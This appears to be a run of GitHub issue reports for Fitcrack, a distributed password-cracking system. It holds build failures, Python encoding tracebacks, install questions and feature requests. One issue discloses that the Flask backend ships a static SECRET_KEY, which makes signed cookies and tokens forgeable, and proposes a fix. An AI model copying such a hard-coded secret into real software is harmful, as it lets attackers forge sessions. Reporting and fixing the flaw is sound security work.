Step 14/76 : RUN echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections
---> Using cache
---> 39ecbccf97f2
Step 15/76 : RUN apt-get install -y -q
---> Using cache
---> edd64e629f77
Step 16/76 : RUN apt-get install -y -q keyboard-configuration
---> Using cache
---> f9279c60e4ae
Step 17/76 : RUN apt install -y mysql-server
---> Using cache
---> 441319c9619a
Step 18/76 : RUN mkdir -p /usr/local/lib/nodejs
---> Using cache
---> da226390a854
Step 19/76 : RUN apt install -y wget xz-utils
---> Using cache
---> 82a3c142b307
Step 20/76 : RUN wget https://nodejs.org/dist/v16.15.0/node-v16.15.0-linux-x64.tar.xz && tar -xJvf node-v16.15.0-linux-x64.tar.xz -C /usr/local/lib/nodejs
---> Using cache
---> ba7f2fedfba0
Step 21/76 : RUN useradd -m -c "BOINC Administrator" boincadm -s /bin/bash
---> Using cache
---> eb3d42223e59
Step 22/76 : RUN groupadd fitcrack
---> Using cache
---> 22c76347bcac
Step 23/76 : RUN usermod -a -G fitcrack boincadm
---> Using cache
---> 86924c1ba5b6
Step 24/76 : RUN apt install -yq build-essential
---> Using cache
---> ad2520478f55
Step 25/76 : RUN apt install -yq m4 dh-autoreconf pkg-config git libmysqlclient-dev zlib1g zlib1g-dev libcurl4-openssl-dev
---> Using cache
---> 69888084768c
Step 26/76 : RUN apt install -yq mysql-client
---> Using cache
---> 3a3b6216e295
Step 27/76 : RUN apt install -yq perl libcompress-raw-lzma-perl
---> Using cache
---> f827da1e089d
Step 28/76 : RUN apt install -yq php php-xml php-mysql php-cli php-gd
---> Using cache
---> 2bb2f6235fad
Step 29/76 : RUN apt install -yq python3 python3-pymysql python3-pip python3-mysqldb
---> Using cache
---> 3d41c68eea27
Step 30/76 : RUN pip3 install urllib3
---> Using cache
---> 0b28e81e47ce
Step 31/76 : RUN ln -s /usr/bin/python3 /usr/bin/python
---> Using cache
---> 81fe205b9c35
Step 32/76 : RUN apt install -yq apache2 apache2-utils libapache2-mod-php libapache2-mod-wsgi-py3
---> Using cache
---> 9bf248db7dfa
Step 33/76 : RUN a2enmod cgi
---> Using cache
---> d00996c819ef
Step 34/76 : RUN a2enmod rewrite
---> Using cache
---> 273526259d8d
Step 35/76 : RUN a2enmod wsgi
---> Using cache
---> 44e3b91cd9cc
Step 36/76 : RUN service apache2 restart
---> Using cache
---> dfe356b2ef44
Step 37/76 : COPY . /srv/fitcrack/
---> Using cache
---> f41044c07517
Step 38/76 : WORKDIR /srv/fitcrack
---> Using cache
---> e068ac6c93fe
Step 39/76 : RUN patch -p0 < installer/fitcrack_changes_in_boinc.patch
---> Running in a7d7225db042
can't find file to patch at input line 4
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/html/project.sample/project.inc boinc/html/project.sample/project.inc
|--- boinc_org/html/project.sample/project.inc 2022-11-19 00:14:19.825528941 +0100
|+++ boinc/html/project.sample/project.inc 2022-11-19 00:23:40.304317833 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
can't find file to patch at input line 18
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/py/Boinc/database.py boinc/py/Boinc/database.py
|--- boinc_org/py/Boinc/database.py 2022-11-19 00:14:20.045529464 +0100
|+++ boinc/py/Boinc/database.py 2022-11-19 00:23:16.808191126 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
can't find file to patch at input line 35
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/py/Boinc/setup_project.py boinc/py/Boinc/setup_project.py
|--- boinc_org/py/Boinc/setup_project.py 2022-11-19 00:14:20.045529464 +0100
|+++ boinc/py/Boinc/setup_project.py 2022-11-19 00:24:27.756566567 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
can't find file to patch at input line 54
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/sched/handle_request.cpp boinc/sched/handle_request.cpp
|--- boinc_org/sched/handle_request.cpp 2022-11-19 00:14:19.877529065 +0100
|+++ boinc/sched/handle_request.cpp 2022-11-19 00:26:13.273089005 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
2 out of 2 hunks ignored
can't find file to patch at input line 81
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/sched/Makefile.am boinc/sched/Makefile.am
|--- boinc_org/sched/Makefile.am 2022-11-19 00:14:19.877529065 +0100
|+++ boinc/sched/Makefile.am 2022-11-19 00:25:23.252846268 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
2 out of 2 hunks ignored
can't find file to patch at input line 180
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/tools/make_project boinc/tools/make_project
|--- boinc_org/tools/make_project 2022-11-19 00:14:20.057529493 +0100
|+++ boinc/tools/make_project 2022-11-19 00:22:32.383944637 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
3 out of 3 hunks ignored
can't find file to patch at input line 239
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/tools/project.xml boinc/tools/project.xml
|--- boinc_org/tools/project.xml 2022-11-19 00:14:20.057529493 +0100
|+++ boinc/tools/project.xml 2022-11-19 00:16:39.929860132 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
can't find file to patch at input line 253
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:

|diff -ruN boinc_org/tools/update_versions boinc/tools/update_versions
|--- boinc_org/tools/update_versions 2022-11-19 00:14:20.057529493 +0100
|+++ boinc/tools/update_versions 2022-11-19 01:20:18.482266394 +0100

File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
The command '/bin/sh -c patch -p0 < installer/fitcrack_changes_in_boinc.patch' returned a non-zero code: 1
ERROR: Service 'fitcrack_server' failed to build : Build failed
root@docker:/home/user/fitcrack# docker-compose version
docker-compose version 1.29.2, build unknown
docker-py version: 5.0.3
CPython version: 3.10.6
OpenSSL version: OpenSSL 3.0.2 15 Mar 2022
root@docker:/home/user/fitcrack# `

From what I can tell the lines that have issues is where its trying to copy files into specific places. I verified the files are there.

Any Ideas out there in the community?

I've forked this repository and updated the BOINC server to be able to run fitcrack with MySQL 8+. However, after overcoming a lot of errors, I've come to a dead end. The frontend and backend are working fine, but I can't connect to the BOINC server. When using BOINC Manager, I get an error while registering an account. Trying it with boinccmd, the registration goes fine, and the project shows up in the manager, but it says "No jobs to process", and I can't see it in the host list from the dashboard. I've looked at apache's access.log, but other than the register GET request, no other requests are being made. Can I get some help?

EDIT: I'm using Ubuntu 20.04 LTS, and actually, some of the backend stuff is broken too, like resource usage monitoring. My current setup is at http://178.250.159.53/

Hi,

I was trying to make a PCFG from the default "honey.txt" dictionary in Webadmin, I get an "Unhandled exception has occurred".

I found the root cause of the issue:

The PCFG endpoint tries to calculate the keyspace of PCFG.

The code that performs this calculation does this by calling an external script pcfg_mower.py; it then also clamps the value returned by the script to sys.maxsize.

However, with the "honeynet.txt" dictionary, shellExec returns an empty string instead of a string with the number representing the keyspace. Then the integer conversion int(pcfgKeyspace) fails and raises a ValueError, which is unhandled.

If I try to run pcfg_mower.py with the "honeynet" PCFG manually, I get this error:

Traceback (most recent call last):
  File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 160, in <module>
    pcfg_mower(config)
  File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 81, in pcfg_mower
    if rules.load_alpha():
  File "/var/www/html/fitcrackAPI/pcfg_mower/rules.py", line 74, in load_alpha
    for rule in f:
  File "/usr/lib/python3.10/codecs.py", line 322, in decode
    (result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe3 in position 1783: invalid continuation byte

So the pcfg_mower.py script crashes with the "honeynet" PCFG, thus never writing anything to standard output, and shellExec thus returns an empty string. shellExec also doesn't check the return value of the run shell command, so the issue becomes apparent only once Webadmin tries to convert the returned empty string to an integer.

As to why the pcfg_mower script fails: The PCFG generated from the "honeynet.txt" dictionary seems to contain invalid UTF-8 bytes. And indeed, if we take a look at the honeynet.txt dictionary, on line 1218, there is the password "N�o" (hex 4E E3 6F). E3 in this context is an invalid UTF-8 byte, causing decoding to fail. E3 here probably represents some character from an extended-ASCII character set, or it could be junk data—I don't know the supposed encoding of the "honeynet.txt" file.

Looking at the offending code in the pcfg_mower script,

we can see that the file encoding is manually set to utf-8. It seems it was set to UTF-8 in response to a similar bug with the "darkweb2017" dictionary (52b32a0). This causes the file-read operations to fail with non–UTF-8 files.

A better way would probably be to use open(fname, 'r', encoding="ascii", errors="surrogateescape") as described in the Python docs on how to handle files with unknown encodings, as this way offers both universal-new-line support for file objects and treats each byte as its own character.

So this issue is quite similar to issue #66, where a Webadmin function expects a file to be in ASCII. I'd wager there are more issues like this in the Python code—it's probably best to inspect every instance a file is opened .py files.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> PCFG
2. Click "Add New"
3. Select "Make from Dictionary"
4. Select "honeynet.txt"
5. Click "Make from Dictionary"
6. Webadmin will show an "An unhandled exception has occurred." error message.

Error log

[Thu Mar 23 13:39:03.887840 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] /var/www/html/fitcrackAPI/src/../pcfg_mower/pcfg_mower.py -i /usr/share/collections/pcfg/honeynet
[Thu Mar 23 13:39:05.895016 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] An unhandled exception occurred.
[Thu Mar 23 13:39:05.895059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.895086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.895093 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     rv = self.dispatch_request()
[Thu Mar 23 13:39:05.895099 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.895106 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.895113 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.895119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.895125 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.895132 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.895138 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.895144 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.895150 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.895157 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.895163 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.895170 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.895177 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.895183 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.895189 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''
[Thu Mar 23 13:39:05.943002 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] [2023-03-23 13:39:05,934] ERROR in app: Exception on /pcfg/makeFromDictionary [POST]
[Thu Mar 23 13:39:05.943059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.943075 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.943086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     rv = self.dispatch_request()
[Thu Mar 23 13:39:05.943094 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.943102 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.943110 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.943119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.943127 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.943174 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.943186 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.943195 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.943204 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.943212 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.943220 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.943228 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.943236 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.943255 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439]     if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.943273 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''

Is it possible that all new host automatically get a started job?
Or do I have to add the host manually always?
thx

Hi. When installing fitcrack on ubuntu 20 with dockerm fitcrack fails to start backend, giving 500 apache error when trying to access port

backend error log:

[wsgi:error] mod_wsgi (pid=687): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] mod_wsgi (pid=687): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] Traceback (most recent call last):
[wsgi:error] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in
[wsgi:error] from app import app as application
[wsgi:error] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in
[wsgi:error] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in
[wsgi:error] from src.database import db
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/database/init.py", line 8, in
[wsgi:error] db = SQLAlchemy()
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/init.py", line 754, in init
[wsgi:error] _include_sqlalchemy(self, query_class)
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/init.py", line 108, in _include_sqlalchemy
[wsgi:error] for key in module.all:
[wsgi:error] AttributeError: module 'sqlalchemy' has no attribute 'all'

Hello,

While trying to setup the Docker version with the comments next to the ports the compose up errors with this:

ERROR: The Compose file './docker-compose.yml' is invalid because:
services.fitcrack_server.ports is invalid: Invalid port "5000" # Port for WebAdmin backend (5443 for SSL):5000", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]
services.fitcrack_server.ports is invalid: Invalid port "80" # Port for WebAdmin frontend (443 for SSL):80", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]

It would be great to have a webhook functionality that make possible to send valueable events notifications such as:

• N new hashes cracked on job M
• job M finished
• An error has occurred on job M

to telegram chat with bot, or any other notification api that accepts GET req with params.

Example webhook URI for telegram:
https://api.telegram.org/bot000000000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/sendMessage?chat_id=-0000000000000&text=URL_encoded_message_text

Hi Team,

Please have a look.
I did all listed here https://github.com/nesfit/fitcrack/blob/master/INSTALL-Installer.md#instubu22
Then I created a folder, make a git clone, and start

Hello,

We have a way to update the web and server side however the database cannot be update as of current. Is their a way to update the sql database?

An additional question/feature request (as I have not seen it yet) - is it possible to add extra parameters to hosts, eg for a dedicated server, -w 4 or for a home user's machine, maybe -w 2 and things like that?

• Workload profile
• Device types

Unsure if this is purely a BOINC issue, is there a setting somewhere in fitcrack to remove this limit?
this limit stops computers from contributing more guesses and I get stuck with 0 clients working.
A thread that has a few people complaining of the same issue, this seems to stem from boinc not giving work to clients
This thread says that there is an option of MAX_TASK_LIMIT that should be accessible by the project host? I can't seem to find this option in fitcrack_OPS

I have tried to add the OneWordlistToListThemAll.txt (99gb) using the "Add from server" functionally this generates the error "An unhandled accepted exception has occurred".

Sometimes this will result in a wordlist being added, but unusable, this includes being unable to delete the entry that was created. Other times nothing happens.

Hello. I installed Fitcrack manually, everything seems to work but on UI I can see error

Can not load http://my-ip/fitcrack/server_status.php?xml=1

Do you know how to solve it? Also, not sure how to connect from headless client as keep on getting Authorization failure: -155, maybe it is related.

Sorry for noob question.

So, I was install fitcrack via README (for best experience with tutorial using Debian 9). But after installing my systemd service fitcrack always crashed with error. I try start fitcrack manually and always see this error:

boincadm@debian:~/projects/fitcrack$ ./bin/start
Traceback (most recent call last):
  File "./bin/start", line 757, in <module>
    config = configxml.ConfigFile(config_filename).read()
  File "/home/boincadm/projects/fitcrack/py/Boinc/boincxml.py", line 138, in read
    raise Exception("%s: Couldn't get elements from XML file")
Exception: %s: Couldn't get elements from XML file

config.xml not contains by default and I can not found example for this. Please give me a way for trouble shooting.

In -h output of ./bin/start I see

--config-file=     Use specified file instead of program-path/../config.xml

But what means in program-path/../config.xml? If it's /home/boincadm/projects/fitcrack or /home/boincadm/projects/ this folders not contains file with same name.

Flask is currently configured with a static value for SECRET_KEY. This means that every Fitcrack installation shares the same, known, secret key. This creates a security vulnerability, as this key is (per its name) to be kept secret, as it is used for signing cookies, JWTs, etc.

I would suggest that the key should either be stored in a config file, and randomly generated or installation, or, preferably, generated fresh every time the server is started:

import secrets
# .........
     flask_app.config['SECRET_KEY'] = secrets.token_hex(16)

Interested in your thought :) I'm happy to make a PR once a solution is agreed upon.

1. What hardware requirements (RAM, CPU, HD) does my server need if I want to run about 500 hosts?
   Is there a bottleneck or are the hosts unlimited in number?

2. Adding hosts automatically is great! It would be great if I could prioritize the individual jobs. For example with a selection button between 1-3. At "1" 50% of the next 10 new hosts are assigned to the job. At "2" 30% and at "3" 20%. So you could prioritize the jobs better when new hosts sign up.

Recently trying to install fitcrack on an oracle cloud instance and keep getting the following error:
`

#0 236.9 x86_64-w64-mingw32-g++ -I'./include/' -I'./include/boinc/' -I'./include/libzip/' -DGIT_REV="\"\"" -Werror -Wall -Wextra -O3 -g3 -std=c++11 -c src/main.cpp -o obj/main.o
#0 40391.1 x86_64-w64-mingw32-g++: fatal error: Killed signal terminated program cc1plus
#0 40391.1 compilation terminated.
#0 40391.7 make: *** [Makefile:45: obj/main.o] Error 1
#0 40394.5 objcopy: './bin/runner.exe': No such file
#0 40394.8 objcopy: './bin/runner.exe': No such file
#0 40394.9 rm: cannot remove './bin/runner.exe': No such file or directory
------
Dockerfile:124
--------------------
 122 |     RUN apt-get install -y g++-mingw-w64-x86-64
 123 |     RUN chmod +x ./update_client_bins.sh
 124 | >>> RUN bash ./update_client_bins.sh
 125 |
 126 |     WORKDIR /srv/fitcrack/
--------------------
ERROR: failed to solve: process "/bin/sh -c bash ./update_client_bins.sh" did not complete successfully: exit code: 1
ubuntu@<SERVERNAME>:~/fitcrack$ 

Server details:
Ubuntu 22.04.1 LTS x86_64
Kernel: 5.15.0-1029-oracle

Its seems that something is terminating the compilation?

Hello. I found this issue in tandem with issue #67. When I try to upload a dictionary containing non-ASCII characters and enable "Sort on upload", Fitcrack gives an "An unhandled exception has occurred." error.

As can be seen in the error log, this part of code is responsible for the bug.

What's more, given the ungrateful exit caused by the unhandled exception, the dictionary will be only half-added, leaving an orphan file and blocking the adding of a dictionary with the same name, but I discuss this issue more concretely elsewhere (see issue #67).

Given that by default Python on Ubuntu 22.04.2 uses UTF-8 encoding for files created by the open function, I assume Fitcrack somehow changes the default file-I/O encoding in Python to ASCII. This is not documented in the end-user manual, however. It does make sense, as I suppose the vast majority of software does not support non-ASCII characters in passwords.

If Fitcrack by design doesn't support non-ASCII dictionary files, I expect the error message to be something like "Dictionary file cannot contain non-ASCII characters" instead of "An unhandled exception has occurred."

However, the creation of a dictionary file with non-ASCII characters succeded (!) when trying to upload the same file with "Sort on upload" disabled. If Fitcrack truly does not support non-ASCII dictionaries, this should not been possible and an error should be raised.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> Dictionaries
2. Enable "Sort on upload"
3. Using "Upload New", try to upload a dictionary that contains non-ASCII characters (for example, buggy_dict.txt)
4. Webadmin will show an "An unhandled exception has occurred." error message.

Error log

[Wed Feb 22 17:29:57.968389 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] An unhandled exception occurred.
[Wed Feb 22 17:29:57.968423 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):[Wed Feb 22 17:29:57.968429 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968434 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968439 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968444 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968449 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968454 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968459 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968463 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968468 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968473 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968478 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968482 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968487 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968503 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968508 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968513 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     l = i.readline()
[Wed Feb 22 17:29:57.968518 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
[Wed Feb 22 17:29:57.968522 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.968527 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)
[Wed Feb 22 17:29:57.968907 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] [2023-02-22 17:29:57,968] ERROR in app: Exception on /dictionary/add [POST]
[Wed Feb 22 17:29:57.968920 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):[Wed Feb 22 17:29:57.968926 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968931 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968935 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968940 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968945 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968949 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968954 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968958 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968963 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968968 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968972 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968977 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968981 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968986 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968991 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968995 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     l = i.readline()
[Wed Feb 22 17:29:57.969000 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]   File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
